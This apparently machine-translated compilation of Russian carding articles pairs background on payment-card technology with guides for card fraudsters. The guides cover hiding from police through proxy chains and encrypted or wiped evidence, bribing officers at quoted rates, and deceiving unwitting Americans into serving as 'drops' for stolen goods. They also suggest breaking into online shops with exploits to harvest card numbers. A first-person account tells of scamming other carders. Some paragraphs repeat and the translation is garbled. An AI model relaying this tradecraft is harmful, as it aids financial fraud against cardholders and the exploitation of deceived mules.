The processor inside each card runs an operating system that provides a fairly user-friendly interface for the developer. It is thanks to this system that it is possible to execute programs, write and read files, encrypt and verify cryptographic data. Its flexibility is so great that Sun Corporation even developed the Java Card platform, which allows its highly popular Java technology to be used to develop specialized applications.
The significantly increased (in comparison with a magnetic card) media capacity and easy access to stored data allow using one card for several types of operations. For example, as a pass, to receive a salary and access to the company's computer network. Thus, you get rid of a tight pile of cards in your wallet, getting one universal card instead.
What prevents the implementation of this wonderful technology in practice? No matter how trite, everything again depends on money. And the point here is not only and not so much in the difference in the cost of the finished cards. The whole point is, first of all, in the huge infrastructure, an extensive network of ATMs, POS terminals and other equipment that has swept the entire planet. Replacement and modification of equipment, development and implementation of software, training of personnel - it is difficult to even imagine how much it will cost.
Because of these complexities, smart cards are still being adopted in narrower markets. For example, many modern computers, especially those designed for corporate customers, have built-in reading devices. Since most operating systems support user authorization using hardware, this can significantly increase the security in the company's computer network. Now, careless users will not stick a piece of paper with a password on the monitor or put it under the keyboard. It will be enough to insert your personal (no vulgarity) card into the slot and you're done.
The news regularly reports that governments of different countries plan to use the capabilities of smart cards to create a new generation of passports, placing in memory a whole file of data for each citizen: biometric information, medical and insurance history, personal "electronic signature" keys, etc.
Scratch cards
Prepaid or scratch card scams are the most common. Indeed, it would not be serious to waste time and money on the development of some clever technologies for reading information under a protective layer. Moreover, profits here are incomparably smaller and limited. It is much more interesting to purchase equipment and organize the production of a large batch of "doubles" as similar as possible to the cards of popular payment systems, telecommunications companies, etc.
Due to the specifics of scratch cards, special attention is paid to their graphic design. Usually, the differences between the "twins" from the original are manifested precisely in the details, when it is impossible to repeat a more complex technological process or miniature elements of the drawing. Thus, in the well-known incident with the spread of counterfeit BI + cards, they could be identified by the wider lines of the barcode and the method of its application (not above the protective layer of the laminate, but below it). Another difference (more noticeable) was the duplicate serial number.
In the simplest case, the numbers are generated randomly. If the criminals somehow manage to get a database of valid numbers and PIN-codes, and then throw such fakes on the market ... These are the nightmares that the heads of security services of large Internet providers and mobile operators have in mind.
That is why many large firms prefer to take the production of "plastic" into their own hands. To do this, they buy equipment for hundreds of thousands of dollars, train personnel and set up their own production. However, it is often enough to buy ready-made cards from specialized companies, and then apply numbers and a protective layer on them at our own facilities.
What's next
The three categories described do not cover the whole variety of cards. For passes and insurance policies, for example, only bar codes are often used, and in discount and club systems, cards may not carry any information at all, except for a unique number and full name. In most cases, a relatively low level of protection can be increased by applying a photograph of the owner (both at the checkpoint and in the store, the accuracy is additionally checked by a person). And sophisticated printing, for example, applying a holographic drawing, helps to protect the card from counterfeiting.
In general, there are a lot of technologies, and tomorrow there will be even more. Is it good? Yes, just wonderful! But the classic said correctly: they steal ...
Card number
The card number is the primary source of information about it: it can be used to find out the type of card, the issuing bank, and also the account number. The structure may differ (for example, there are Visa cards with 13 and 16-digit numbers), but by the first digit you can always determine which system it belongs to:
- 3 - American Express, Diners Club and some other systems
- 4 - Visa
- 5 - Master Card
- 6 - Discover Card
Card life
First stage: production of components
After assembly, a special key (fabrication key, KF) is embedded in the chip. It does not allow changes to be made to it until it is directly sealed in plastic. KF is created using special algorithms and using the manufacturer's master key, which is unique for each issued card.
Second stage: before personalizing the card
The finished chip comes from a blank smart card company. It is installed on site on a plastic base and tested. FK is replaced by the personalization key (KP). For additional security, a Vper (personalization lock) block is installed on the KP. Physical access to memory is completely closed, and only the software method is used to write and change information. After that, the system areas, which contain the pledged keys, are inaccessible for reading and writing.
Stage three: card personalization
This step is performed by the issuing company (for example, a bank). Special software is written into the memory, data files are generated containing information about the cardholder, PIN-code, etc. Finally, the data is closed with a Vutil (utilization lock) block. After that, the card can be issued to its new owner.
Stage four: using the card
During use, programs are activated, they access the logical file system, start encryption mechanisms, etc. Access to data is determined by a built-in security policy.
Stage five: expiration
The transition to the final stage can be initiated in two ways. The first is done by a program that writes the last block (invalidation lock) to the master file. After that, any write operations become unavailable, but read operations can be performed, for example, to analyze the stored information. Another way is to set the block to a PIN code and an additional unblocking PIN code. In this case, all operations become impossible, even reading.
Many of us may not even know that we are smart card users. For example, the SIM-card of your cell phone is the same "smart card", but without the "extra" plastic.
Students, businessmen and housewives have them - debit and credit, for travel by public transport, payment for telephone calls, Internet access, etc.
According to the ISO-7810 standard, a plastic card is a rectangular plate 85.6x54 mm in size and 0.76 mm thick.
On bank cards, the following are recorded on the tracks: account number, currency code, country code of issue, owner's name, validity period (in principle, the same information that is printed on the card itself, but in digital form).
For encryption, a one-way cryptographic method is used. It is easy to calculate their value in one direction using the bank key and the entered PIN code.
And although the procedure looks familiar to the user who withdraws money (entered the PIN-code and you're done), a complex mechanism of encrypted data exchange works inside the system.
Now, careless users will not stick a piece of paper with a password on the monitor or put it under the keyboard. It will be enough to insert your personal (no vulgarity) card into the slot and you're done.
For passes and insurance policies, for example, only bar codes are often used, and in discount and club systems, cards may not carry any information at all, except for a unique number and full name.
Practical advice for a young carder
It's good to be rich. Buy cool cars, drive girls to restaurants, and hang out somewhere in Cyprus on weekends. Basically, that's why people start doing carding - they want quick money, they want to go to Cyprus.
But it so happens that the road leads not under the palm trees, but straight to the prison barrack, where the sky is in a box, and you play the role of a girl yourself. And the fault is not uncles in uniform, who sooner or later will come for you, but you, since you did not take care of your safety in time.
After surfing the Internet and talking with smart people, I picked up a small collection of hints from the series "How to Protect Yourself". Perhaps some of them will seem trivial to you, but this does not make them less important. Read and remember. And then, if you're lucky, you will be able to avoid dates with cops.
So as not to be a fool, read carefully the UK
Many newies who are drawn into carding are so excited about the idea of winning a free jackpot that they forget about the legal side of their affairs. After all, all these skarzhenny players and disks, laptops and cash are not falling from the moon. They are someone's, and you did not pick them up on the street, but you stole them. And theft is criminally punishable, even in the Criminal Code it is written. Uncles in uniform will be guided by this very Criminal Code when they come to pick you up from your mom and dad in jail. And you must learn this very Criminal Code like the back of your hand in order to know how long the parents can lose their son if the son breaks the wood.
The main articles that you should pay attention to are 159 (fraud), 165 (causing property damage by deception or abuse of trust), 174 (laundering money or other property acquired by other persons in a criminal way), 175 (acquisition or sale of property , knowingly obtained by criminal means), 186 (making or selling counterfeit money or securities), 187 (making or selling counterfeit credit or payment cards and other payment documents), 272 (illegal access to computer information) and 273 (creating, using and the spread of malicious programs for computers). You can download the text of the Criminal Code at
http://nalog.akcentplus.ru/kodeksrf/ugol.rar. In general, before you climb "into battle", thoroughly find out and realize exactly where you are climbing.
The less you talk, the less likely you are to ruin yourself.
If, despite all the horrors described in the Criminal Code, you nevertheless decided to take a responsible step, remember the simple but important rule: "Silence is gold." Of course, I want to boast to the Kents of my elite and free stuff. Tell Vovan how cool you cheated an Uzbek from America. But where are the guarantees that Vova will not tell Petya, and Petya, out of envy, will not tell police major Kozlov? Do not think that your partner, with whom you have been doing business for several months and chatting on ICQ all day long, will not pledge you if he gets pissed off. During interrogations and processing by cops, he will not think about you and your friendship, but about his skin and freedom. And even the closest relatives in whom you are completely confident should not be privy to the intricacies of your work. They can accidentally blurt out too much, and you have to sit out.
After joining the carder business, your connections should be divided into personal and business ones. Those with whom you lead friendship and love should not know anything about business, and those with whom you do business and money (other carders), let them remain in the dark about your real life.
And further. If, in addition to carding, you use all sorts of chats and like to show off on the forums, do not sit everywhere under the same nickname. The "working" nickname should not be shone anywhere else. It happens that you look, like a respectable person, a thunderstorm of credits and drops, and you enter a nickname into ya.ru, and on the very first pag that falls down you read an ad five years ago: "Young and handsome, I will meet a young and beautiful", and below the actual phone number.
Proxy is the best defense, use it and you are the elite
Since most of the carder operations are now carried out via the Internet, it's time to think about how to cover your ass while surfing the Internet. In this business, proxy servers are the best friend for carders. Not every proxy provides complete anonymity. Some of them, although they are intermediaries between your computer and the attacked victim, do not hide the real address. Others leave information about the use of proxies. And given the fact that not all resources allow you to go under the proxies, and not all users trust the guys who are looking for proxies, this is not good. You can see if the server sees your proxy here -
www.all-nettools.com/pr.htm.
Therefore, our choice is anonymous proxies. They do not leave any unnecessary information and do a good job with their main function - ensuring anonymity. A large list of anonymous proxies can be found at kiev-security.org.ua/box/a1/2.shtml, or go to netspy.ukrpack.net. On carderplanet, for 60 VMs per month, they offer to buy access to hundreds of fast anonymous proxies (or 500K for 300 green). If you have extra money, I advise you to take advantage of this offer, since private servers are in any case better than public ones. You can check the proxy server for anonymity here -
www.samair.ru/proxy/proxychecker.
If you seriously think about your security, you need not only Opera (IE) to run under your proxies, but also an IRC client, a FTP client and even ICQ. For the convenience of work and configuration, I advise you to download the amusing program Anonimity4Proxy (
http://cr0aker.tiraet.com/cgi-bin/topdl/download.pl?file=128). It provides settings for proxy connections through any ports, the ability to auto-replace servers after some time, the ability to disable browser-inaccessible functions that leave traces on the Web, and other useful features.
If you are running a simple business, for example, trying to spioneer an mp3 player, then one anonymous proxy will be enough. But if the turnover of your business is tens of thousands of dollars, the feds can easily request information from the proxy under which you played pranks, and the server owner, if you like it or not, will have to look into the logs and find your real IP. To make it harder for the people in black, you need to create a chain of proxy connections. In this case, you first connect to one proxy server, then from it you go to the second, from the second to the third, and then, through all these nodes, you connect to the computer you need. At the same time, communication, to put it mildly, deteriorates a little, but your safety increases many times over. In theory, a chain of three proxies is enough to not be found, although there are no guarantees. You never know what you will do and how seriously they will hunt you. For convenient work with proxy chains, download the SocksChain program.
And, of course, do not forget about the firewall, which should be at your post 24 hours a day and close as many ports as possible. There are many similar programs, I can advise you to install Outpost Firewall, which has already proven itself excellent for a long time. Grab it from
www.agnitum.com/products/outpost.
Do not throw your colleagues, do not let yourself be thrown
Despite the fact that carding itself implies deceiving other people (almost always bourgeois), within the carder community, people who throw "theirs" cause only contempt. Their lists are kept on the carderplanet on a kind of board of shame, and they are called either Woodpeckers or Scum of Society. Nevertheless, their number is not decreasing. All the time, there are especially smart-ass individuals who do not bother with the etiquette accepted in the environment (the carder community has its own rules of behavior) and are guided by only one goal - to cut down more dough. Among the several thousand readers of the
www.carderplanet.net forum, there are dozens of such scammers. All of them can be divided into three categories: beginners, amateurs and pros.
For the first, the tactics are as simple as two kopecks - they offer the members of the forum a product or service that they supposedly have, they require an advance payment, and when they receive money, they simply stop responding to soap / ICQ. As a rule, the guys from this category are poorly versed in carding issues and on the forum have a newis status (or generally unregistered). In the conversation, preference is given to discussing the size and method of transferring payments, rather than describing the services provided. It will not be difficult for an attentive person to identify this kind of scammer, having previously talked with him for some time on ICQ.
Representatives of the second category are more savvy in throwing colleagues in the craft. Initially, they establish themselves on the forum, honestly providing customers with goods, gaining the trust of other carders. But over time, when orders become more serious, the quality of services gradually diminishes. And when the people stop believing the excuses, the scammer reels the rods and simply disappears. True, only in order to reappear soon, but under a different nickname.
Professional scammers are similar in ways of earning money to their colleagues from the second category, but they have much more experience, and the divorce of members of the forum is their constant and often only job. These guys have been hanging out in the carder environment for a long time, they know all the insiders and the rules, they know how to find an approach to everyone, even the most suspicious client (although they usually give preference to newies). Due to the knowledge of the pros in carding, as well as their caution, it is not easy to identify the thugs in them.
The best advice here would be to beware of dealing with unfamiliar people. Members of the forum usually leave feedback on the quality of the services provided, and before you contact a person, carefully read what others have to say about him. Good protection against scammers is provided by the guarantor service, that is, a third party whose authority is beyond question and through which the transaction is carried out. If a person agrees to this option, it already says something. It would be nice to pay attention to the status of the user as well. Although membership in "verified" does not give a 100% guarantee, the percentage of throws among them is lower than among some "newbies".
Never rush to send money. Credits, private proxies, useful information are all good, of course, but take the trouble to talk to their seller first. Always try to agree on payment after receiving the goods, or at least on an advance payment (a small part of the money is paid in advance, and if everything goes well, the rest of the money will be sent). Well, if you have already been thrown, report it on the forum so that the thrown does not get rich for an even greater amount.
And the last thing - I do not advise you to take this path yourself. You will be much more beneficial to yourself if you earn respect among the carders than if you waste your time for small things, throwing newies. People who throw their own people are often looked for and rather severely punished. If you really want to throw someone, turn your dealings with the bourgeoisie. They are richer and live much further.
Look for only good drops
As you know, in carding, drops play a very important role - figureheads through whom you cash out stolen money or receive goods stored in online stores. For his help, the drop receives a monetary reward, and, since all goodness first comes to his home address, it is he who will be responsible to the cops if something happens. It's not so easy to find a good drop. There are also many greedy, dishonest people in America (and this is where the figurehead should live). And the chance that the drop will prefer to keep the goods for themselves instead of dubious cooperation is large enough. Therefore, the search and work with drops must be approached wisely.
Basically, virtually every low- to middle-income American is a potential drop. A good way to find people is ICQ with their white pags or forums where they are looking for work (there are a million of them in the AngloNet). If you have a hard time with English, you can look for our emigrants among the residents of the United States, although it is more profitable to work with the indigenous bourgeoisie. Throwing noodles on a Russian is not the same as fooling an American. In order for the drop to be led to your offer, you need to create the appearance that you are a representative of a solid developing company, which has its own staff, website, branded soap boxes and similar nonsense. The style of letters should be appropriate - formal-business, which shows how the company values each client.
When people respond to your proposal, tell the story prepared in advance about how you have been successfully cooperating with the West for a long time and reselling the products there. That you need people who are ready to receive and send goods, making money on it. Or, if you need to cash out dollars, another legend (come up with it yourself). The first time you work with a drop, check it out. Do not send him expensive goods, do not ask him to cash out a large sum. Only when you see that a person is doing his job honestly and without delay, promote him further. Try to find out as much information as possible about this person, and also keep him constantly in touch. If he feels that he is in demand and regularly receives the promised reward, he will not even think of leaving you. And so that everything is generally wonderful, take the trouble to build a contract, affix "company" signatures and seals and send by fax. This will create the illusion of the legality of the case, and when the American mentors
knock on the door of the intermediary (and this will surely happen in a few months), he will have some proof of his innocence in the incident.
Despite the fact that it is cheaper and more convenient to work with uninitiated drops, sometimes it makes sense to use the services of professionals. These are people who know that goods and money are dirty. And they deliberately take responsibility for all the machinations. Naturally, for a rather large percentage (usually half the amount). On the carderplanet forum, you can find people who are always ready to cash out or accept goods. You can also use the services of foreign offices that cash out money in the E-Gold system (a list of them can be found at
www.golddirectory.com/e-gold.htm). In any case, when doing carding, always act through a front man. Do not give your real address anywhere and never. It also should not be known by the drops themselves, with whom you work, and additional intermediaries through which you may be in contact with the drops. And if u "
So as not to swear later, burn any compromising evidence
During the hard work of earning other people's money, you will gradually accumulate useful good: credit numbers, passwords and other joys, which you will call "your treasure." For people in gray greatcoats, these same things are called "evidence". And you need to take care of this very evidence ahead of time.
Firstly, if you do not have PGP, download this necessary program from the site
www.pgp.com and encrypt your screw so that you will become afraid of such protection yourself.
Secondly, wean yourself from the bad habit of writing down business information on scraps of paper and throwing them anywhere. If the cops come and find a piece of paper with long-used credits under the sofa, you will only have to bite your elbows and watch this cheat sheet ruin your life. There should not be any compromising information on a mobile device, or a PDA, or on floppy disks buried deep in the glasses. Everything on your computer, everything is encrypted. And if you urgently need to remove a particularly compromising file, use the Kremlin program (
www.kremlinencrypt.com), which erases in such a way that no uneraser will help.
Inveterate carders also recommend using a virtual pussy. In short, this is a program that creates an image of a new computer on a screw, and you can work with it as if another machine were connected to you via a grid. At first, the "hard drive" of the emulated wheelbarrow is pristine, and you can install any OS, any programs on it. VirtualPC has one very useful feature that makes this a "must have" for every self-respecting carder. On a virtual computer, you can run any application, surf in any network jungle, and generally do whatever you want. All this will be temporarily saved on the fake screw, but it is enough to end the session, click "refuse to save", and all information about your last movements will be deleted. The virtual computer will take the form it had when it was turned on.
I got to the cops - don't blame me, but get some money for them
Despite all the immeasurable anonymity with which you have surrounded yourself, no one will give you one hundred percent guarantees that you will not fall into the clutches of cops. And if the fatal moment has come, when they are rattling at the door with a menacing cry: "Open, police!", Do not panic, go to plan B. A lot of articles have been written on the topic of communicating with cops, for example, a good selection of materials can be found at
www.prison.org. The main thing that you must remember, cops are deceitful, ingratiating and cunning creatures. And they are not your friends, but sworn enemies. They will promise you freedom in exchange for a frank confession, convincing you that the more you say, the less you will serve. But don't be fooled, in fact, everything is exactly the opposite. They don't give a fuck, they have to fulfill the standards, plant exactly as many faces as they give a premium. So be courageous and answer all the questions of the investigator: "Uncle, what are you, but I don't even know such terms." The more you say, the more you sign, the brighter and longer your life in the zone will be. It is better to remain silent and sleep off for three days in a monkey house than to have a heart-to-heart talk with a "good" opera and then slurp gruel for 3 years.
By the way, do you know that the cops, though all of themselves and incorruptible, but also want to eat. And they are unlikely to refuse if you make a financial contribution to the fund for the development of their families. And for this they will close your business out of friendship and release you in peace. It is best to give it on the paw right away, because when it comes to the prosecutor's office, it will be much more difficult (or more expensive) to excuse it. Tariffs vary from 200 to 2 thousand bucks, depending on the severity of your offense, the quality of the compromising evidence against you and the greed of the cops. On average, 500 bucks, I think, should be enough. If you pretend to be an ever-hungry student, you can bargain for a cheaper price. You can almost always agree. Cops understand people in this regard.
But my advice to you, do not bring it to this. Talking to operas is not a pleasant experience. Have your head on your shoulders, know how to use it and always be a little paranoid. Where, where, but in carding, this quality never hurts.
Carder's path
Dedicated to beginner carders.
For a beginner in the carding business, there are two initial paths that largely determine his further authority and development:
1. The way of the ripper - the easiest at the beginning - the way of throwing "honest carders" at cards or vmz. Immediately determines the negative attitude towards the very person of scammers.
2. The path of "honest carder" - the path that requires sufficient knowledge in the field of hacking and social engineering. As a person who has gone through both these paths, I want to describe each of them in
sufficient detail, having considered all their pros and cons.
The ripper's way
Rippers are usually inexperienced young people who are not familiar with carding itself, as such (most are just children). An inexperienced young scammer is easy to identify by the newly-zapped 9th sign, and definitely by his childish speech. But there are also several copies of professional, well-organized rippers on the network, for example, a person known on many carder portals under the nickname BAO (this can rather be attributed to the VERY well-organized rippers section than to professional ones). The main tool of scammers is social engineering - it is 100% verified
that no measures, including even guarantors, can save you from the cunning and experienced scammers.
The first steps
The first thing I did when I decided to try myself in the field of ripping (I must say by that time I was already a pretty good singer) was selling ordinary cards with a cvv code. To do this, I found a card seller on one of the forums and made him a "super offer", telling him that I wanted to buy 7000 usa cards with cvv. Of course, not a single
seller would have refused such an order (one of the main threads of the singer's management - greed - jumped up), and said that he was ready to sell them to me. For the sake of order, I broke a little, knocked down the price a little and asked him for 100 pieces for checking, convincing him that I would be a regular and profitable buyer. Having received his 100 free cards, he went offline and changed the ICQ (on asechka.ru, the usual 6-signs are sold at 1 vmz apiece).
Easy Money
The second serious desire was the desire to get rich =). Because honestly, there were already quite a lot of stolen cards (~ 600 pcs.), I decided to breed people already for money. It turned out to be easy, I offered people to buy huge databases for ridiculous money (the first deal was 3,000 cards for 180 VMZ, with a minimum "market" price of 1.5 VMZ apiece) and offered for verification those cards obtained for free. Thus, I cut about $ 600 in 2 months.
Evolution
Then simple cards with cvv code ceased to interest me, tk. were cheap and did not bring much profit. The next step was selling cards with full info and enroll. Here I earned about $ 200 more, but somehow it didn’t go well, and I decided to do something else - more profitable. I decided to “sell” the carved technique. Do you know the site carderproduct.org? These are the real scammers. I worked more modestly but still made a good dough on this one. The nokia 6600 and nubuck phones sold especially well =). There are many ways to breed a person, but for all of them you need to have good experience in sine engineering. It is important to present yourself as a serious seller and show that you are not going to make concessions and prove to the buyer that it is in his interests so that you work with him. On the contrary, you can seem like a stupid lamer and make a lot of concessions,
Conclusion
Juvenile rippers are pathetic, despicable people, worthy of only regret, ready to shake your soul out of you for 5 bucks with their inept attempts to throw you. Professional rippers personally inspire me only respect, as excellent singers (although I must say this talent could be used better).
Pros:
-not a lot of intelligence
-safe enough -you
can make good money (200 - 300 $ per month)
Minuses:
- negative attitude from normal carders
Post scriptum
During the period of work with enroll, I realized that you can make good money on it without throwing anyone, and, having found a drop, I began to pour it.
Carder's path
Many articles have already been written about this, so I will not repeat them, but I will simply write something missing in them, or I will correct the obsolete errors of these articles. For a person who decides to become a normal carder, it is necessary to have a good base in terms of hacking. Many old articles "for novice carders" wrote about hacking Internet shops through Google using primitive php / perl inlude buggies. Now this no longer passes, or the current passes with the most decayed shops in which there is hardly anything useful. For a start, you can advise somewhere to get (buy) the hoster's base - there probably are a couple of shops. In the end, you can simply scan the shop's server for vulnerable services and break it with some public or private exploit. So you can get the cards. Then they can be sold, which gives a small but stable income, and most importantly, it is safe enough. Then you can use cards for purchasing in internet shops
(of course, order not for yourself - there are drops for this). If you have cards with full info, you can use them for online access (enroll) and manage the cardholder's account via the Internet; it is possible to carry out transfer operations to other accounts, etc., but this is fraught with a call from the bank, which requires, firstly, a good knowledge of English, and secondly, again the skill of cinematography. You can order for yourself the so-called "white plastic" and go shopping in real shops.
Pros:
-you can earn a lot of money
-you can productively cooperate with other carders
Minuses:
- quite unsafe - a beginner initially needs good knowledge in the field of hacking
Conclusion
I am not encouraging people to do carding. This article was written solely for information and safety, and also just as a journalistic story =).
Concise carder-Russian dictionary
CC, cardboard, cards - credit cards or information about them.
Fraud is an illegal operation. With all the ensuing consequences.
Cardholder - card holder.
CVV / CVV2 / CVN code - three to four digits that improve the protection of cards when paying via the Internet. Now cards without this code are practically not accepted anywhere.
Check cards (check for validity) - check credit cards for performance. The credit could have been used before you, because of which the cardholder could block it and, therefore, nothing can be done on it. Therefore, credits should be taken from trusted sellers or checked somewhere. The check usually consists in withdrawing the minimum possible amount from the card (about 10 cents). If you manage to remove it, it means that the credit is working, and it must be urgently driven somewhere. It is better to check through special programs or in special places. I do not advise you to check on porn sites, since that is where they are killed.
A driver is a person who knows how to correctly buy a product in an e-store or an account on a porn site, so that the transaction declined message does not appear.
Clothes carding - one of the varieties of carding, consists in buying real things with a stolen credit. Usually these are household appliances, since they can then be sold. And it is necessary to sell, because, firstly, it is very difficult to import it into Russia, and secondly, no one needs material evidence at home. The sale can be carried out, for example, by a foreign drop.
Drop (from the English drop - to throw) - a person on whom cash, checks or goods ordered in a store are "thrown off", which he then transfers to his employer. The drop may not know that everything was purchased in a not entirely honest way. Or vice versa, do it professionally.
Weier (wire transfer) - bank transfer. It takes a long time, but reliably. Chargeback is very likely if the money is stolen. Chargeback (money back) - money review. They make online stores, banks, electronic payment systems. Fired when a carding victim claims to have been robbed. Therefore, in carding, great importance is attached to money laundering and cashing.
Money orders or Cashier Checks are checks that have been paid in advance. Of all types of checks, these are the most convenient for carders. With the rest, you have to mess around for a long time: send them for verification to another bank and fill out a bunch of papers. And these checks do not require such stress, although their commission percentage is not weak.
Transaction is a card operation that begins with the identification of the cardholder and up to the moment the money is issued.
Stick - PayPal, an electronic payment system (like our WebMoney). The essential difference is that you can transfer money there from credits. True, it is becoming more and more difficult to do this - input limits, withdrawal limits and many other restrictions are organized.
A raider is a person who helps to transfer money into cash. Let's say you received a check. You give it to the clerk - you get cash. Raiders won't pour credits! They mainly work with checks, bank viers, money orders.
Escrow services are offices that play the role of guarantors when working with auctions. You send them money, the ES informs the seller that there is money, and he (the seller) sends the goods. Having received it, you inform about it, and the money goes to the seller.
White plastic is not plastic from elite manufacturers, as the "guru" of carding once told me, but just a white piece of plastic (usually CR-80 brand) with an empty magnetic stripe. Looks like a blank CD, and you can also record a lot of interesting things on it.
Dump - information recorded on the magnetic stripe of the credit card. Usually consists of 2 or 3 tracks.
Track - a piece of information recorded on the card. There are 3 of them on the map. The first is information about the owner, the second is information about the owner, about the bank, etc., the third is a spare or for additional information. The most important is the second track. The third is not interesting to us, since it does not represent anything valuable.
The issuer of the plastic card (card issuer) - the office that issued the card. It can be a bank, a shop (discount card), etc. We will talk about bank credit cards, so we will consider banks as issuers.
BIN (Bank Identification Number) - the first few digits of the card number, which indicate the issuing bank. These are usually the first six digits. If the bank is very large, the first three digits are sufficient. Acquiring bank (acquirer) - the bank responsible for the primary processing of transactions. That is, at first he works with your credit card, shops where you buy goods, ATMs where you receive money. It is he who distributes stop lists.
Authorization is the process of checking the availability of funds in the client's account.
A merchant account is a special bank account that is opened by a merchant in order to withdraw money from card accounts. For example, you decided to accept credit cards. You open such an account in a bank, and money from buyers comes to it. In order not to wait for the money to be transferred from the card account, the bank pays you out of its own pocket, and waits for that money itself. Therefore, to open such an account, you just need to radiate confidence that your stall will not go bankrupt tomorrow.
An embosser is a device that squeezes out information on cards. Pay attention to the fact that the letters are not drawn on the credit cards, but as if they are squeezed out? This is what the embosser does.
Encoder (reader) - a device for reading and writing information from the magnetic stripe of a credit card.
ATM (Automatic Teller Machine) - ATM.
An imprinter is a device that prints on a slip the data embossed on the card and data about the point at which the imprinter is located.
POS-terminal (point-of-sale terminal) - a device installed in stores. It reads the information recorded on the magnetic stripe and contacts the bank for the transaction. Unlike an ATM, a POS terminal is operated by a cashier. In most cases, customer identification is visual, meaning the cashier does not ask for a PIN or ID. This does not apply to several types of cards that require full authorization and identification in use.
We consider the credit from all sides
Credit cards have long been included in our daily life finally and irrevocably. Many, with their appearance, almost forgot about cash. Of course, this was influenced by many concomitant factors: practicality, convenience, prevalence and relative safety.
But today we will consider credits not from the usual - electronic - side, but from a slightly different one - what kind of piece of plastic it is and how it works.
History
The very first credit cards appeared about a hundred years ago (in the USA - where else), then they were used exclusively in shops, restaurants and hotels to serve respectable regular customers, and there was no question of any serial production. Cards, in fact, replaced the payment by installments. In those distant times, credits were made of thick cardboard, then metal cards (already embossed) appeared, and only then, after lengthy experiments with various plastics, did plastic cards appear.
The first firm to serially issue credit cards (for the restaurant business) was the Dinners Club (since 1949). Then, for the first time, a credit manufacturing company worked as an intermediary between a buyer and a seller. Dinners Club also tried to create a universal card (by the way - the company is still alive). Then American Express (the largest manufacturer of traveler's checks), Bank of America and Chase Manhattan Bank (the two largest banks in the country) took over the production of credit. In 1966, Bank Of America made a major breakthrough by allowing other banks to transact with their BankAmericard branded credit cards. In a short time, this payment system acquired a national scale, then a second such system was organized in the country - the Interbank Cards Association.
Soon, plastic cards became an international standard, the number of users was measured in tens of millions. In 1976, Americard changed its name to Visa (to enter the global arena), and in 1980 MasterCharge changed to MasterCard. For several years, these payment systems have become the largest in the world (in the banking environment) and are not going to give up their positions. By the way, these two systems opposed each other for a long time, forbidding banks to issue both cards at the same time, but that was before. The improvement of the credit continues to this day, the next stage of evolution is planned for an almost complete transition to smart cards, which will add many advantages (first of all, serious protection based on cryptographic algorithms), but I will talk about this below.
Standard
The introduction of the world standard was a decisive factor for universal acceptance. Today there are credit cards of only one standard - ID-1, others are simply (yet or already) not used. This standard defines everything up to a hundredth of a millimeter, each element of the credit must be exactly in its place and fully perform the function assigned to it. Naturally, absolutely all service equipment (imprinters, electronic terminals, ATMs) is produced according to this world standard. Manufacturers of plastic cards are only allowed to experiment with the design of cards, and even then in a very strict framework.
All credit cards can be divided into several classes:
- Chip cards (smart cards) - credit cards with a built-in microcircuit or memory (chip).
- Embossed cards are credit cards, part of the text on which is printed by embossing or thermal printing. Embossed text is necessary for printing receipts, but it is used mainly in the United States and for visual recognition of text.
- Magnetic cards are credits with a magnetic stripe.
This division is extremely arbitrary, since in most credits these characteristics are combined (sometimes all three at the same time).
A credit card consists of several separate functional elements, which I will discuss in more detail below: a piece of plastic (with embossed text), a magnetic stripe, a microcircuit or memory (chip) and some other less significant elements.
The foundation
The card itself is made of a piece of special plastic measuring 85.6x53.98x0.76 mm. Plastic is produced using a complex technology, painted, mandatory general information about the issuer and the payment association is applied to the blank, as well as a memo to the owner, contact information of the manufacturer and a photo of the owner. After this, the credit is laminated, then (if necessary) the necessary identification data (card number, owner's name, expiration date) are embossed or laser burned on it, a chip or magnetic stripe is embedded. During production, special attention is paid to safety during personalization of the card (applying the owner's identification data and flashing the microcircuit memory (encoding)). Also, all stages of the production of loans are under close quality control - the marriage must be eliminated immediately,
Magnetic stripe
The magnetic stripe is located on the reverse of the credit, at the top, near the top edge. Outwardly, it does not represent anything interesting - a black or brown stripe along the entire length of the card. The strip consists of several magnetic tracks (most often 3). Its width ranges from 10.1 to 10.3 mm (if there are 3 tracks on the creed). Each track is responsible for storing its own information, with a maximum of 107 characters (numeric or alphabetic) per track.
- Track 1 contains basic information: identification number, general information about the owner, information about the issuer, card expiration date and some service information.
- Track 2 is responsible for authorizing the card (it completely determines what operations and for what amount you can perform with the credit), and also duplicates part of the information from the first track.
- Track 3 is mainly used when working with an ATM (sometimes it may not exist - then the magnetic stripe will be narrower). The first two tracks are read-only, the third is also for writing (for example, an ATM makes notes about the withdrawal of money on it). To protect the magnetic stripe from counterfeiting, there are special verification codes CVV (Card Verification Value) for Visa and CVC (Card Verification Code) for Europay, but they cannot resist copying the strip.
Chip
The chip is the most high-tech element of the credit, and, naturally, this type of card has been used relatively recently. It is safe to say that smart cards are the future (or rather, the present).
Chip cards have many advantages over others and only one disadvantage. The first plus is the reliable storage of information. And this is one of the determining factors in financial transactions (after all, no one wants to lose money). Although, as you know, there is no impenetrable defense. Then, if a microcircuit is used in the card, then the credit itself can decide on the legality of the transaction being performed. The disadvantages include, perhaps, the relatively high production cost of the card.
Chip cards are divided into memory cards and microcircuit cards.
The most common now are credits with memory (this is the simplest version of a chip card).
EEPROM (electrically erasable programmable read-only memory) is used to store information. To ensure the safety of financial transactions, all memory is divided into several zones, each of which is protected separately (each with its own key, one of them with your pin-code). The terminal is engaged in reading information and determining the validity of the card.
Microcircuit cards are much more complex, and, accordingly, the cost of their production is much higher. The credits use 8-bit percent, and also have permanent (ROM) and random access (RAM) memory. The same EEPROM is used to store information. The working software (a kind of operating system) is hardcoded and cannot be overwritten. Hardware cryptographic protection is usually built on RSA (Rivest-Shamir-Adleman) or DES (Data Encryption Standard) algorithms - you've probably read about them many times in Hacker.
Of course, no batteries are provided on the card, so the credit is "turned on" only when the operating voltage is supplied to it by the terminal (through the contacts of the chip).
One of the bonuses of a microcircuit credit is an electronic wallet. It is implemented in hardware and is a special file in memory that contains information about the amount of funds in the account. To access the wallet, you need to know the pin code. When adding or debiting funds from the account, the file changes accordingly.
Most chip credits use the EMV specification developed by the largest payment systems: Europay, MasterCard and Visa.
With all this, the credit card can perform additional functions. For example, to play the role of a contactless metro pass (by the way, such credits are sometimes given to students even in our universities).
